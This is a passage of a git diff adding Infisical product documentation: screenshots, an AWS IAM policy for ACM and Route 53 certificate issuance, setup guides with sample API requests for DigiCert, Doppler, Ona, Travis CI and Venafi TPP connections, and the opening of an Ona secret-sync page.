b/docs/images/platform/external-migrations/vault-in-platform/select-migration-provider.png new file mode 100644 index 00000000000..a95e2775f57 Binary files /dev/null and b/docs/images/platform/external-migrations/vault-in-platform/select-migration-provider.png differ diff --git a/docs/images/platform/gateways/gateway-create-button.png b/docs/images/platform/gateways/gateway-create-button.png new file mode 100644 index 00000000000..df34e314dfc Binary files /dev/null and b/docs/images/platform/gateways/gateway-create-button.png differ diff --git a/docs/images/platform/gateways/gateway-create-form.png b/docs/images/platform/gateways/gateway-create-form.png new file mode 100644 index 00000000000..821764b10f5 Binary files /dev/null and b/docs/images/platform/gateways/gateway-create-form.png differ diff --git a/docs/images/platform/gateways/gateway-pools-add-gateway.png b/docs/images/platform/gateways/gateway-pools-add-gateway.png new file mode 100644 index 00000000000..e6e2fb8eeeb Binary files /dev/null and b/docs/images/platform/gateways/gateway-pools-add-gateway.png differ diff --git a/docs/images/platform/gateways/gateway-pools-click-pool.png b/docs/images/platform/gateways/gateway-pools-click-pool.png new file mode 100644 index 00000000000..8025414ba29 Binary files /dev/null and b/docs/images/platform/gateways/gateway-pools-click-pool.png differ diff --git a/docs/images/platform/gateways/gateway-pools-create.png b/docs/images/platform/gateways/gateway-pools-create.png new file mode 100644 index 00000000000..b07487d15fd Binary files /dev/null and b/docs/images/platform/gateways/gateway-pools-create.png differ diff --git a/docs/images/platform/gateways/gateway-pools-switch.png b/docs/images/platform/gateways/gateway-pools-switch.png new file mode 100644 index 00000000000..1d055219a87 Binary files /dev/null and b/docs/images/platform/gateways/gateway-pools-switch.png differ diff --git a/docs/images/platform/gateways/gateway-pools-tab.png 
b/docs/images/platform/gateways/gateway-pools-tab.png new file mode 100644 index 00000000000..4742bde4634 Binary files /dev/null and b/docs/images/platform/gateways/gateway-pools-tab.png differ diff --git a/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-certificate-created.png b/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-certificate-created.png new file mode 100644 index 00000000000..0d7fd1cf6db Binary files /dev/null and b/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-certificate-created.png differ diff --git a/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-copy-hosted-zone-id.png b/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-copy-hosted-zone-id.png new file mode 100644 index 00000000000..2a53da8ce82 Binary files /dev/null and b/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-copy-hosted-zone-id.png differ diff --git a/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-external-ca-form.png b/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-external-ca-form.png new file mode 100644 index 00000000000..5d1da518222 Binary files /dev/null and b/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-external-ca-form.png differ diff --git a/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-external-ca-page.png b/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-external-ca-page.png new file mode 100644 index 00000000000..640aecf55a6 Binary files /dev/null and b/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-external-ca-page.png differ diff --git a/docs/images/platform/pki/digicert/digicert-external-ca-form.png b/docs/images/platform/pki/digicert/digicert-external-ca-form.png new file mode 100644 index 00000000000..3f2702e9ba5 Binary files /dev/null and b/docs/images/platform/pki/digicert/digicert-external-ca-form.png differ diff --git a/docs/images/platform/pki/integrations/jamf-pro/jamf-webhook-config.png 
b/docs/images/platform/pki/integrations/jamf-pro/jamf-webhook-config.png new file mode 100644 index 00000000000..1169a466b8b Binary files /dev/null and b/docs/images/platform/pki/integrations/jamf-pro/jamf-webhook-config.png differ diff --git a/docs/images/platform/pki/integrations/jamf-pro/scep-config-challenge-dynamic.png b/docs/images/platform/pki/integrations/jamf-pro/scep-config-challenge-dynamic.png new file mode 100644 index 00000000000..c6023bbec59 Binary files /dev/null and b/docs/images/platform/pki/integrations/jamf-pro/scep-config-challenge-dynamic.png differ diff --git a/docs/images/platform/pki/venafi-tpp/venafi-tpp-certificate-created.png b/docs/images/platform/pki/venafi-tpp/venafi-tpp-certificate-created.png new file mode 100644 index 00000000000..5bccade9615 Binary files /dev/null and b/docs/images/platform/pki/venafi-tpp/venafi-tpp-certificate-created.png differ diff --git a/docs/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-created.png b/docs/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-created.png new file mode 100644 index 00000000000..a2f85de95a8 Binary files /dev/null and b/docs/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-created.png differ diff --git a/docs/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-form.png b/docs/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-form.png new file mode 100644 index 00000000000..0b69a145cb9 Binary files /dev/null and b/docs/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-form.png differ diff --git a/docs/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-page.png b/docs/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-page.png new file mode 100644 index 00000000000..51efa9e6e58 Binary files /dev/null and b/docs/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-page.png differ diff --git a/docs/images/secret-rotations-v2/generic/add-secret-rotation.png b/docs/images/secret-rotations-v2/generic/add-secret-rotation.png index 4b1b626ae23..d8c1867d5c7 
100644 Binary files a/docs/images/secret-rotations-v2/generic/add-secret-rotation.png and b/docs/images/secret-rotations-v2/generic/add-secret-rotation.png differ diff --git a/docs/images/secret-rotations-v2/supabase-api-key/configuration.png b/docs/images/secret-rotations-v2/supabase-api-key/configuration.png new file mode 100644 index 00000000000..2ef726bd2de Binary files /dev/null and b/docs/images/secret-rotations-v2/supabase-api-key/configuration.png differ diff --git a/docs/images/secret-rotations-v2/supabase-api-key/created.png b/docs/images/secret-rotations-v2/supabase-api-key/created.png new file mode 100644 index 00000000000..623bbf4edc4 Binary files /dev/null and b/docs/images/secret-rotations-v2/supabase-api-key/created.png differ diff --git a/docs/images/secret-rotations-v2/supabase-api-key/details.png b/docs/images/secret-rotations-v2/supabase-api-key/details.png new file mode 100644 index 00000000000..2935b46a8a9 Binary files /dev/null and b/docs/images/secret-rotations-v2/supabase-api-key/details.png differ diff --git a/docs/images/secret-rotations-v2/supabase-api-key/parameters.png b/docs/images/secret-rotations-v2/supabase-api-key/parameters.png new file mode 100644 index 00000000000..798c17dfec6 Binary files /dev/null and b/docs/images/secret-rotations-v2/supabase-api-key/parameters.png differ diff --git a/docs/images/secret-rotations-v2/supabase-api-key/review.png b/docs/images/secret-rotations-v2/supabase-api-key/review.png new file mode 100644 index 00000000000..ae76a817f48 Binary files /dev/null and b/docs/images/secret-rotations-v2/supabase-api-key/review.png differ diff --git a/docs/images/secret-rotations-v2/supabase-api-key/secrets-mapping.png b/docs/images/secret-rotations-v2/supabase-api-key/secrets-mapping.png new file mode 100644 index 00000000000..8adc0ca9dfd Binary files /dev/null and b/docs/images/secret-rotations-v2/supabase-api-key/secrets-mapping.png differ diff --git 
a/docs/images/secret-rotations-v2/supabase-api-key/select-supabase-api-key.png b/docs/images/secret-rotations-v2/supabase-api-key/select-supabase-api-key.png new file mode 100644 index 00000000000..baba82fcbf9 Binary files /dev/null and b/docs/images/secret-rotations-v2/supabase-api-key/select-supabase-api-key.png differ diff --git a/docs/images/secret-syncs/ona/ona-created.png b/docs/images/secret-syncs/ona/ona-created.png new file mode 100644 index 00000000000..91044948a59 Binary files /dev/null and b/docs/images/secret-syncs/ona/ona-created.png differ diff --git a/docs/images/secret-syncs/ona/ona-destination.png b/docs/images/secret-syncs/ona/ona-destination.png new file mode 100644 index 00000000000..875d9a7f8d0 Binary files /dev/null and b/docs/images/secret-syncs/ona/ona-destination.png differ diff --git a/docs/images/secret-syncs/ona/ona-details.png b/docs/images/secret-syncs/ona/ona-details.png new file mode 100644 index 00000000000..6c3c0bec414 Binary files /dev/null and b/docs/images/secret-syncs/ona/ona-details.png differ diff --git a/docs/images/secret-syncs/ona/ona-options.png b/docs/images/secret-syncs/ona/ona-options.png new file mode 100644 index 00000000000..0bc474d810c Binary files /dev/null and b/docs/images/secret-syncs/ona/ona-options.png differ diff --git a/docs/images/secret-syncs/ona/ona-review.png b/docs/images/secret-syncs/ona/ona-review.png new file mode 100644 index 00000000000..0b76ed87fac Binary files /dev/null and b/docs/images/secret-syncs/ona/ona-review.png differ diff --git a/docs/images/secret-syncs/ona/ona-source.png b/docs/images/secret-syncs/ona/ona-source.png new file mode 100644 index 00000000000..9c4481fe308 Binary files /dev/null and b/docs/images/secret-syncs/ona/ona-source.png differ diff --git a/docs/images/secret-syncs/ona/select-ona-option.png b/docs/images/secret-syncs/ona/select-ona-option.png new file mode 100644 index 00000000000..980c85edf7e Binary files /dev/null and 
b/docs/images/secret-syncs/ona/select-ona-option.png differ diff --git a/docs/images/secret-syncs/travis-ci/select-travis-ci-option.png b/docs/images/secret-syncs/travis-ci/select-travis-ci-option.png new file mode 100644 index 00000000000..08efa4864d1 Binary files /dev/null and b/docs/images/secret-syncs/travis-ci/select-travis-ci-option.png differ diff --git a/docs/images/secret-syncs/travis-ci/travis-ci-created.png b/docs/images/secret-syncs/travis-ci/travis-ci-created.png new file mode 100644 index 00000000000..b790d682902 Binary files /dev/null and b/docs/images/secret-syncs/travis-ci/travis-ci-created.png differ diff --git a/docs/images/secret-syncs/travis-ci/travis-ci-destination.png b/docs/images/secret-syncs/travis-ci/travis-ci-destination.png new file mode 100644 index 00000000000..2ee9811707a Binary files /dev/null and b/docs/images/secret-syncs/travis-ci/travis-ci-destination.png differ diff --git a/docs/images/secret-syncs/travis-ci/travis-ci-details.png b/docs/images/secret-syncs/travis-ci/travis-ci-details.png new file mode 100644 index 00000000000..2416613df95 Binary files /dev/null and b/docs/images/secret-syncs/travis-ci/travis-ci-details.png differ diff --git a/docs/images/secret-syncs/travis-ci/travis-ci-options.png b/docs/images/secret-syncs/travis-ci/travis-ci-options.png new file mode 100644 index 00000000000..333eb96710e Binary files /dev/null and b/docs/images/secret-syncs/travis-ci/travis-ci-options.png differ diff --git a/docs/images/secret-syncs/travis-ci/travis-ci-review.png b/docs/images/secret-syncs/travis-ci/travis-ci-review.png new file mode 100644 index 00000000000..e9861c8dc9d Binary files /dev/null and b/docs/images/secret-syncs/travis-ci/travis-ci-review.png differ diff --git a/docs/images/secret-syncs/travis-ci/travis-ci-source.png b/docs/images/secret-syncs/travis-ci/travis-ci-source.png new file mode 100644 index 00000000000..dbdb1e1d4e7 Binary files /dev/null and b/docs/images/secret-syncs/travis-ci/travis-ci-source.png 
differ diff --git a/docs/images/self-hosting/helper/upgrade-path-tool.png b/docs/images/self-hosting/helper/upgrade-path-tool.png deleted file mode 100644 index a8a538aaf40..00000000000 Binary files a/docs/images/self-hosting/helper/upgrade-path-tool.png and /dev/null differ diff --git a/docs/integrations/app-connections/aws.mdx b/docs/integrations/app-connections/aws.mdx index acbdc78a4ed..6ad1e305e01 100644 --- a/docs/integrations/app-connections/aws.mdx +++ b/docs/integrations/app-connections/aws.mdx @@ -331,6 +331,67 @@ Infisical supports two methods for connecting to AWS. Using a specific CA ARN in `Resource` is recommended over `"*"` to follow the principle of least privilege. + + Use the following custom policy to grant the minimum permissions required by Infisical to issue publicly-trusted certificates via AWS Certificate Manager and perform DNS validation through Route 53. + + **ACM permissions** β€” `RequestCertificate` cannot be scoped below `"*"` because the certificate ARN does not exist until after the call succeeds: + + ```json + { + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "AllowAcmPublicCaAccess", + "Effect": "Allow", + "Action": [ + "acm:RequestCertificate", + "acm:DescribeCertificate", + "acm:ExportCertificate", + "acm:RenewCertificate", + "acm:RevokeCertificate", + "acm:ListCertificates" + ], + "Resource": "*" + } + ] + } + ``` + + **Route 53 permissions** β€” scope to the hosted zone(s) used for DNS validation: + + ```json + { + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "AllowRoute53ForAcmValidation", + "Effect": "Allow", + "Action": [ + "route53:GetHostedZone", + "route53:ChangeResourceRecordSets" + ], + "Resource": "arn:aws:route53:::hostedzone/YOUR_HOSTED_ZONE_ID" + } + ] + } + ``` + + ACM and Route 53 permissions can live on the same IAM principal, or be split across two separate connections in Infisical. 
+ + + **ACM Permissions:** + - **RequestCertificate**: Requests a new public certificate from ACM + - **DescribeCertificate**: Retrieves certificate status and DNS validation records + - **ExportCertificate**: Exports the issued certificate and private key to Infisical + - **RenewCertificate**: Triggers renewal of an existing certificate + - **RevokeCertificate**: Revokes a previously issued certificate + - **ListCertificates**: Used during connection validation + + **Route 53 Permissions:** + - **GetHostedZone**: Validates the hosted zone during CA setup + - **ChangeResourceRecordSets**: Writes the ACM DNS validation CNAME records + + @@ -662,6 +723,67 @@ Infisical supports two methods for connecting to AWS. Using a specific CA ARN in `Resource` is recommended over `"*"` to follow the principle of least privilege. + + Use the following custom policy to grant the minimum permissions required by Infisical to issue publicly-trusted certificates via AWS Certificate Manager and perform DNS validation through Route 53. 
+ + **ACM permissions** β€” `RequestCertificate` cannot be scoped below `"*"` because the certificate ARN does not exist until after the call succeeds: + + ```json + { + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "AllowAcmPublicCaAccess", + "Effect": "Allow", + "Action": [ + "acm:RequestCertificate", + "acm:DescribeCertificate", + "acm:ExportCertificate", + "acm:RenewCertificate", + "acm:RevokeCertificate", + "acm:ListCertificates" + ], + "Resource": "*" + } + ] + } + ``` + + **Route 53 permissions** β€” scope to the hosted zone(s) used for DNS validation: + + ```json + { + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "AllowRoute53ForAcmValidation", + "Effect": "Allow", + "Action": [ + "route53:GetHostedZone", + "route53:ChangeResourceRecordSets" + ], + "Resource": "arn:aws:route53:::hostedzone/YOUR_HOSTED_ZONE_ID" + } + ] + } + ``` + + ACM and Route 53 permissions can live on the same IAM principal, or be split across two separate connections in Infisical. + + + **ACM Permissions:** + - **RequestCertificate**: Requests a new public certificate from ACM + - **DescribeCertificate**: Retrieves certificate status and DNS validation records + - **ExportCertificate**: Exports the issued certificate and private key to Infisical + - **RenewCertificate**: Triggers renewal of an existing certificate + - **RevokeCertificate**: Revokes a previously issued certificate + - **ListCertificates**: Used during connection validation + + **Route 53 Permissions:** + - **GetHostedZone**: Validates the hosted zone during CA setup + - **ChangeResourceRecordSets**: Writes the ACM DNS validation CNAME records + + diff --git a/docs/integrations/app-connections/digicert.mdx b/docs/integrations/app-connections/digicert.mdx new file mode 100644 index 00000000000..b249c5974b8 --- /dev/null +++ b/docs/integrations/app-connections/digicert.mdx @@ -0,0 +1,116 @@ +--- +title: "DigiCert Connection" +description: "Learn how to configure a DigiCert connection for Infisical." 
+--- + +Infisical supports connecting to [DigiCert CertCentral](https://dev.digicert.com/en/certcentral-apis.html) using a **CertCentral API Key**. This connection powers the [DigiCert Certificate Authority](/documentation/platform/pki/ca/digicert-direct) for direct (non-ACME) certificate issuance. + + + This connection is for the DigiCert **CertCentral Services API**. If you are using DigiCert's + ACME endpoint with External Account Binding (EAB) credentials, use the + [ACME Certificate Authority](/documentation/platform/pki/ca/acme-ca) instead. + + +## Prerequisites + +- A CertCentral account with sufficient permissions to create API keys and place certificate orders +- At least one validated CertCentral organization that will be listed on issued certificates +- A CertCentral user with a role that can place and manage orders (typically **Manager** or **Administrator**) — the API key inherits its permissions from this user + +## Create a CertCentral API Key + + + + In your CertCentral account, go to **Automation** → **API Keys** and click **Add API Key**. + + ![CertCentral API Keys](/images/app-connections/digicert/step-1.png) + + + Give the key a descriptive name (e.g. `infisical`) and **assign a user whose role is Manager or Administrator**; the key inherits that user's permissions on CertCentral. + + Under **API key restrictions**, leave the default **None** or select **Orders, Domains, Organizations**. + + Copy the generated key value; it is only shown once. + + ![CertCentral Create Key](/images/app-connections/digicert/step-2.png) + + + + + Create a dedicated API key for Infisical rather than reusing an existing one so you can rotate or + revoke access independently. + + +## Create DigiCert Connection in Infisical + + + + + + In your Infisical dashboard, go to **Organization Settings** → **App Connections**.
+ + ![App Connections Tab](/images/app-connections/general/add-connection.png) + + + Click **Add Connection** and choose **DigiCert** from the list of available connections. + + ![Select DigiCert Connection](/images/app-connections/digicert/digicert-app-connection-option.png) + + + Complete the form with: + - A **name** for the connection (e.g. `digicert-prod`) + - An optional **description** + - The **CertCentral Region** matching your account, **US** or **EU** + - Your **CertCentral API Key** + + ![DigiCert Connection Form](/images/app-connections/digicert/digicert-app-connection-form.png) + + + After clicking **Create**, Infisical validates the key by calling + `GET /services/v2/organization`. Once the key is confirmed, the connection is ready to use + in a DigiCert Certificate Authority. + + ![DigiCert Connection Created](/images/app-connections/digicert/digicert-app-connection-created.png) + + + + + To create a DigiCert Connection, make an API request to the [Create DigiCert Connection](/api-reference/endpoints/app-connections/digicert/create) API endpoint. 
+ + ### Sample request + + ```bash Request + curl --request POST \ + --url https://app.infisical.com/api/v1/app-connections/digicert \ + --header 'Content-Type: application/json' \ + --data '{ + "name": "my-digicert-connection", + "method": "api-key", + "credentials": { + "apiKey": "", + "region": "us" + } + }' + ``` + + ### Sample response + + ```bash Response + { + "appConnection": { + "id": "a1b2c3d4-86f7-4026-a95e-efb8aeb0d8e6", + "name": "my-digicert-connection", + "description": null, + "version": 1, + "orgId": "6f03caa1-a5de-43ce-b127-95a145d3464c", + "createdAt": "2026-04-20T00:00:00.000Z", + "updatedAt": "2026-04-20T00:00:00.000Z", + "isPlatformManagedCredentials": false, + "app": "digicert", + "method": "api-key", + "credentials": {} + } + } + ``` + + diff --git a/docs/integrations/app-connections/doppler.mdx b/docs/integrations/app-connections/doppler.mdx new file mode 100644 index 00000000000..91e228028b7 --- /dev/null +++ b/docs/integrations/app-connections/doppler.mdx @@ -0,0 +1,125 @@ +--- +title: "Doppler Connection" +description: "Learn how to configure a Doppler Connection for Infisical." +--- + +Infisical supports the use of API Tokens to connect with Doppler. This connection is used for importing secrets from Doppler into Infisical via the [external migration tool](/documentation/platform/external-migrations/doppler). + +## Create a Doppler API Token + + + + Log in to your Doppler account and go to the Tokens tab. + + ![Doppler Dashboard](/images/app-connections/doppler/doppler-dashboard.png) + + + In the User Tokens page, click in **Manage service accounts** . + + ![Doppler Service Accounts](/images/app-connections/doppler/manage-service-accounts.png) + + + Click in the "+" icon, provide a descriptive name, and confirm creation. + + ![Doppler Create Token](/images/app-connections/doppler/doppler-create-service-account.png) + + + Click the pencil icon next to your service account role to modify the role of the service account. 
+ ![Doppler Service Account Role](/images/app-connections/doppler/doppler-service-account-select-role.png) + + + For the best migration experience, we recommend that you give the service account full access to all your projects in order to migrate from all projects within Doppler. + + ![Doppler Service Account Role](/images/app-connections/doppler/doppler-service-account-configure-role.png) + + + + Click in the "+" icon in the Service Account API Tokens container + + ![Doppler Token Created](/images/app-connections/doppler/service-account-api-token-creation.png) + + + Add a name for the API Token and click in Create API Token + + ![Doppler Token Created](/images/app-connections/doppler/create-api-token.png) + + + Copy the generated token and save it, you will need it in the nexts steps + + ![Doppler Token Created](/images/app-connections/doppler/copy-the-generated-code.png) + + + +## Create a Doppler Connection in Infisical + + + + + + In your Infisical dashboard, navigate to **Organization Settings** and select the **App Connections** tab. + + ![App Connections Tab](/images/app-connections/general/add-connection.png) + + + Click **+ Add Connection** and choose **Doppler Connection** from the list of available connections. + + ![Select Doppler Connection](/images/app-connections/doppler/doppler-app-connection-option.png) + + + Complete the form by providing: + - A descriptive name for the connection + - An optional description + - The API Token value from the previous step + + ![Doppler Connection Form](/images/app-connections/doppler/doppler-app-connection-form.png) + + + After submitting the form, your **Doppler Connection** will be successfully created and ready to use for importing secrets into Infisical. 
+ + ![Doppler Connection Created](/images/app-connections/doppler/doppler-app-connection-created.png) + + + + + + + To create a Doppler Connection via API, send a request to the [Create Doppler Connection](/api-reference/endpoints/app-connections/doppler/create) endpoint. + + ### Sample request + + ```bash Request + curl --request POST \ + --url https://app.infisical.com/api/v1/app-connections/doppler \ + --header 'Content-Type: application/json' \ + --data '{ + "name": "my-doppler-connection", + "method": "api-token", + "credentials": { + "apiToken": "[API TOKEN]" + } + }' + ``` + + ### Sample response + + ```bash Response + { + "appConnection": { + "id": "3c2a1b4d-97e6-4f18-b3c2-8e5d9a0f1234", + "name": "my-doppler-connection", + "description": null, + "version": 1, + "orgId": "6f03caa1-a5de-43ce-b127-95a145d3464c", + "createdAt": "2025-04-23T19:46:34.831Z", + "updatedAt": "2025-04-23T19:46:34.831Z", + "isPlatformManagedCredentials": false, + "credentialsHash": "9a1e482fbc306g93b1d6e2ce0d081b340dfcbg99f005b7c506f3ecd1391772g0", + "app": "doppler", + "method": "api-token", + "credentials": {} + } + } + ``` + + + diff --git a/docs/integrations/app-connections/gitlab.mdx b/docs/integrations/app-connections/gitlab.mdx index 6c45c4b30b6..2db44b27866 100644 --- a/docs/integrations/app-connections/gitlab.mdx +++ b/docs/integrations/app-connections/gitlab.mdx @@ -8,6 +8,10 @@ Infisical supports two methods for connecting to GitLab: **OAuth** and **Access The OAuth method provides secure authentication through GitLab's OAuth flow. + + + Oauth Method is only supported in Self-Hosted mode. + Using the GitLab Connection with OAuth on a self-hosted instance of Infisical requires configuring an OAuth application in GitLab and registering your instance with it. 
diff --git a/docs/integrations/app-connections/ona.mdx b/docs/integrations/app-connections/ona.mdx new file mode 100644 index 00000000000..a6e09d4563a --- /dev/null +++ b/docs/integrations/app-connections/ona.mdx @@ -0,0 +1,113 @@ +--- +title: "Ona Connection" +description: "Learn how to configure an Ona Connection for Infisical." +--- + +Infisical supports connecting to [Ona](https://www.gitpod.io/) (Gitpod's cloud development environment platform) using a Personal Access Token (PAT). + +## Create an Ona Personal Access Token + + + + + In the lower-left corner of Ona, select your name, then click the gear icon to open user settings. + + ![Open Account setting](/images/app-connections/ona/ona-account-settings.png) + + + + + ![PAT tab](/images/app-connections/ona/ona-access-token-tab.png) + + + + Click the **New Token** button and add a description for the token (eg, "infisical integration"). The token must have Read & Write access so that Infisical can apply changes in Ona. + + + Personal access tokens have an expiration date, so you will need to manually rotate them before they expire to avoid integration downtime. Consider setting a calendar reminder for this task. + + + ![Open PAT section](/images/app-connections/ona/ona-pat-section.png) + ![New token modal](/images/app-connections/ona/ona-pat-creation-modal.png) + + + Make sure to save the token, as it won't be shown again. + + ![Copy Token](/images/app-connections/ona/ona-pat-copy.png) + + + +## Create an Ona Connection in Infisical + + + + + + In your Infisical dashboard, open the **Integrations** tab for the desired project and select **App Connections**. Click **+ Add Connection**. + + ![App Connections Tab](/images/app-connections/general/add-connection.png) + + + Choose **Ona Connection** from the list of integrations. + + ![Select Ona Connection](/images/app-connections/ona/ona-app-connection-option.png) + + + Complete the form by providing: + + - A descriptive **Name** for the connection. 
+ - An optional **Description**. + - The **Personal Access Token** you generated in Ona. + + ![Ona Connection Modal](/images/app-connections/ona/ona-app-connection-form.png) + + + After submitting the form, your **Ona Connection** will be created. + + ![Ona Connection Created](/images/app-connections/ona/ona-app-connection-generated.png) + + + + + + To create an Ona Connection via API, send a request to the [Create Ona Connection](/api-reference/endpoints/app-connections/ona/create) endpoint. + + ### Sample request + + ```bash Request + curl --request POST \ + --url https://app.infisical.com/api/v1/app-connections/ona \ + --header 'Content-Type: application/json' \ + --data '{ + "name": "my-ona-connection", + "method": "personal-access-token", + "projectId": "abcdef12-3456-7890-abcd-ef1234567890", + "credentials": { + "personalAccessToken": "[PERSONAL ACCESS TOKEN]" + } + }' + ``` + + ### Sample response + + ```bash Response + { + "appConnection": { + "id": "a1b2c3d4-5678-90ab-cdef-1234567890ab", + "name": "my-ona-connection", + "description": null, + "projectId": "abcdef12-3456-7890-abcd-ef1234567890", + "version": 1, + "orgId": "abcdef12-3456-7890-abcd-ef1234567890", + "createdAt": "2025-01-23T10:15:00.000Z", + "updatedAt": "2025-01-23T10:15:00.000Z", + "isPlatformManagedCredentials": false, + "credentialsHash": "d41d8cd98f00b204e9800998ecf8427e", + "app": "ona", + "method": "personal-access-token", + "credentials": {} + } + } + ``` + + diff --git a/docs/integrations/app-connections/travis-ci.mdx b/docs/integrations/app-connections/travis-ci.mdx new file mode 100644 index 00000000000..cfe483fee79 --- /dev/null +++ b/docs/integrations/app-connections/travis-ci.mdx @@ -0,0 +1,104 @@ +--- +title: "Travis CI Connection" +description: "Learn how to configure a Travis CI Connection for Infisical." +--- + +Infisical supports connecting to [Travis CI](https://www.travis-ci.com/) using a personal API Token. 
+ + + The API Token must belong to a user with sufficient permissions to manage + environment variables on the repositories you plan to sync with Infisical. + + +## Create a Travis CI API Token + + + + Navigate to [https://app.travis-ci.com](https://app.travis-ci.com) and click your profile avatar in the top-right corner, then select **Settings**. + + + In the **Settings** tab, locate the **API authentication** section. Click **Copy Token** to reveal and copy your personal API token. + + ![Copy Travis CI API Token](/images/app-connections/travis-ci/travis-ci-copy-token.png) + + + Treat this token like a password β€” it grants access to every repository you + have permission to administer. Store it somewhere safe; Infisical will + encrypt it at rest once the connection is created. + + + + +## Create a Travis CI Connection in Infisical + + + + + + In your Infisical dashboard, open the **Integrations** tab in the target project and select **App Connections**. + + ![App Connections Tab](/images/app-connections/general/add-connection.png) + + + Click **+ Add Connection** and choose **Travis CI Connection** from the list. + + ![Select Travis CI Connection](/images/app-connections/travis-ci/travis-ci-app-connection-option.png) + + + Complete the form by providing: + - A descriptive **Name** for the connection + - An optional **Description** + - The **API Token** you copied from Travis CI + + ![Travis CI Connection Form](/images/app-connections/travis-ci/travis-ci-app-connection-modal.png) + + + After submitting, your **Travis CI Connection** is ready to be used by Secret Syncs and other Infisical features. + + + + + + + To create a Travis CI Connection via API, send a request to the [Create Travis CI Connection](/api-reference/endpoints/app-connections/travis-ci/create) endpoint. 
+ + ### Sample request + + ```bash Request + curl --request POST \ + --url https://app.infisical.com/api/v1/app-connections/travis-ci \ + --header 'Content-Type: application/json' \ + --data '{ + "name": "my-travis-ci-connection", + "method": "api-token", + "projectId": "7ffbb072-2575-495a-b5b0-127f88caef78", + "credentials": { + "apiToken": "[API TOKEN]" + } + }' + ``` + + ### Sample response + + ```bash Response + { + "appConnection": { + "id": "e5d18aca-86f7-4026-a95e-efb8aeb0d8e6", + "name": "my-travis-ci-connection", + "projectId": "7ffbb072-2575-495a-b5b0-127f88caef78", + "description": null, + "version": 1, + "orgId": "6f03caa1-a5de-43ce-b127-95a145d3464c", + "createdAt": "2026-04-17T19:46:34.831Z", + "updatedAt": "2026-04-17T19:46:34.831Z", + "isPlatformManagedCredentials": false, + "credentialsHash": "example-credentials-hash", + "app": "travis-ci", + "method": "api-token", + "credentials": {} + } + } + ``` + + + diff --git a/docs/integrations/app-connections/venafi-tpp.mdx b/docs/integrations/app-connections/venafi-tpp.mdx new file mode 100644 index 00000000000..8acc5560e7c --- /dev/null +++ b/docs/integrations/app-connections/venafi-tpp.mdx @@ -0,0 +1,63 @@ +--- +title: "Venafi TPP Connection" +description: "Learn how to configure a Venafi Trust Protection Platform (TPP) Connection for Infisical." +--- + +Connect Infisical to a self-hosted Venafi Trust Protection Platform (TPP) instance to use it as an external CA for certificate issuance and management. 
+ +## Prerequisites + +- A self-hosted [Venafi Trust Protection Platform](https://venafi.com/) instance (on-premises or private cloud) +- An API Integration registered in your TPP instance with OAuth enabled +- A TPP user account with `certificate:manage,discover,revoke` and `configuration` scope privileges +- Network connectivity from Infisical to the TPP server (or an Infisical Gateway for airgapped environments) + + + To register an API Integration in Venafi TPP, navigate to **API** > **API Integrations** in the TPP web console + and create a new integration with a Client ID. This Client ID is required when setting up the connection in Infisical. + + +## Connection Setup + + + + Navigate to the **App Connections** tab on the **Organization Settings** page. + ![App Connections Tab](/images/app-connections/general/add-connection.png) + + + Select the **Venafi TPP** option from the connection options modal. + ![Select Venafi TPP Connection](/images/app-connections/venafi-tpp/venafi-tpp-select-connection.png) + + + Configure the following fields: + + - **Name**: A friendly name for this connection (e.g., "Production TPP") + - **Method**: The authentication method. Currently only **OAuth** is supported. + - **Gateway** *(optional)*: Select an Infisical Gateway if your TPP instance is in an airgapped network without direct internet access. + - **TPP URL**: The HTTPS URL of your Venafi TPP instance (e.g., `https://tpp.example.com`). Must use HTTPS. + - **Client ID**: The OAuth Client ID from your TPP API Integration. + - **Username**: The TPP user account. Supports formats: `DOMAIN\username`, `username@domain.com`, or local usernames. + - **Password**: The password for the TPP user account. + + Click **Connect to Venafi TPP** to validate your credentials and create the connection. 
+ + ![Venafi TPP Connection Form](/images/app-connections/venafi-tpp/venafi-tpp-app-connection-form.png) + + + Infisical validates the credentials by authenticating with the TPP OAuth endpoint during connection creation. + If validation fails, verify that: + - The TPP URL is correct and reachable + - The Client ID matches an API Integration registered in TPP + - The username and password are correct + - The API Integration has the required scopes enabled + + + + Your **Venafi TPP Connection** is now available for use as an external CA in your Infisical certificate management projects. + ![Venafi TPP Connection Created](/images/app-connections/venafi-tpp/venafi-tpp-app-connection-created.png) + + + +## Gateway Support + +For Venafi TPP instances running in airgapped or isolated networks, you can route the connection through an [Infisical Gateway](/documentation/platform/gateways/overview). Select the appropriate gateway when creating the connection to enable Infisical to reach your TPP server through a secure tunnel. diff --git a/docs/integrations/secret-syncs/ona.mdx b/docs/integrations/secret-syncs/ona.mdx new file mode 100644 index 00000000000..5a7b743ee85 --- /dev/null +++ b/docs/integrations/secret-syncs/ona.mdx @@ -0,0 +1,156 @@ +--- +title: "Ona Sync" +description: "Learn how to configure an Ona Sync for Infisical." +--- + +**Prerequisites:** + +- Set up and add secrets to [Infisical Cloud](https://app.infisical.com) +- Create an [Ona Connection](/integrations/app-connections/ona) + + + + + + + Navigate to **Project** > **Integrations** and select the **Secret Syncs** tab. Click on the **Add Sync** button. + + ![Secret Syncs Tab](/images/secret-syncs/general/secret-sync-tab.png) + + + ![Select 